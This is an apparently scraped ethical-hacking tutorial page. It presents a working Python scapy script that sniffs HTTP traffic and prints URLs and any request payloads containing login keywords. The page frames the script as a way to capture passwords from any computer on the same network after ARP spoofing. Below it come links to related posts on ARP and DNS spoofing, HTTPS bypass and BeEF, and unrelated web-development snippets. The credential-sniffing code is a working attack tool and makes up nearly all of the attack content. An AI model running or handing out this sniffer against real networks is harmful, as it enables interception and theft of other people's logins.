Capturing passwords from any computer connected to the same network. 

ARP_SPOOF + PACKET_SNIFFER

  • Target a computer on the same network.
  • arp_spoof to redirect the flow of packets(become MITM)
  • Packet_sniffer to see URLs, usernames, and passwords sent by the target.
#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def get_url(packet):

    return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore')

def get_login_info(packet):

    if packet.haslayer(scapy.all.Raw):

        load = packet[scapy.all.Raw].load.decode(errors='ignore')

        keywords = ["username", "user", "login", "password", "pass"]

        for keyword in keywords:

            if keyword in load:

                return load

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        url = get_url(packet)

        print("[+] HTTP Request >> " + url)

        login_info = get_login_info(packet)

        if login_info:

            print("\n\n[+] Possible username/password > " + login_info + "\n\n")

sniff("eth0")

Python Ethical Hacking - Packet Sniffer(2)的更多相关文章

  1. Python Ethical Hacking - Packet Sniffer(1)

    PACKET_SNIFFER Capture data flowing through an interface. Filter this data. Display Interesting info ...

  2. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  5. Python Ethical Hacking - BeEF Framework(1)

    Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

    Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  9. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

随机推荐

  1. position中的四种属性

    Position有四个属性值,分别是static .fixed. relative .absolute. 第一个属性值是static,这是position的默认属性,一般我们都不会用到它,所以也很少提 ...

  2. vue 生命周期:

    vue  生命周期: 1. beforeCreate()创建组件;        2. created() 创建完成;        3. beforeMounte() 组件被挂裁前;        ...

  3. Ubuntu搭建Java开发环境-刘志敏-专题视频课程

    Ubuntu搭建Java开发环境-3人已学习 课程介绍        主要介绍在Ubuntu环境如何安装Java开发的基本环境课程收益    学会Ubuntu中安装jdk.mysql.maven和id ...

  4. js事件入门(1)

    1.事件相关概念 1.1 什么是事件? 事件是用户在访问页面时执行的操作,也就是用户访问页面时的行为.当浏览器探测到一个事件时,比如鼠标点击或者按键.它可以触发与这个事件相关的JavaScript对象 ...

  5. Linux命令查勘进程:ps -ef |grep java

    一.ps -ef |grep java 查看包含“java”的所有进程 二.涉及命令详解 ps命令将某个进程显示出来(是LINUX下最常用的也是非常强大的进程查看命令) grep命令是查找(是一种强大 ...

  6. oracle如何实现自增?----用序列sequence的方法来实现

    将表t_user的字段ID设置为自增:(用序列sequence的方法来实现) ----创建表 Create  table  t_user( Id number(6),userid varchar2(2 ...

  7. 恕我直言你可能真的不会java第9篇-Stream元素的匹配与查找

    在我们对数组或者集合类进行操作的时候,经常会遇到这样的需求,比如: 是否包含某一个"匹配规则"的元素 是否所有的元素都符合某一个"匹配规则" 是否所有元素都不符 ...

  8. Linux查看docker容器日志

    docker logs -f 容器名或ID | grep fail | more grep fail:过滤包含fail的日志内容

  9. rhel7 rpmbuild 制作二进制程序安装包(.rpm) 简单示例

    下载rpm-build: # yum install rpm-build 如果上述方式无法安装(没配置网络源,虚拟机下是安装媒介源) 可以用下列方式下载后再安装(实践结果可能版本问题引起的缺少太多的* ...

  10. 一天学习一点之如何安装nodejs

    如果没有安装git,先使用命令apt-get install git,然后按以下步骤安装即可 Install the dependencies:sudo apt-get install g++ cur ...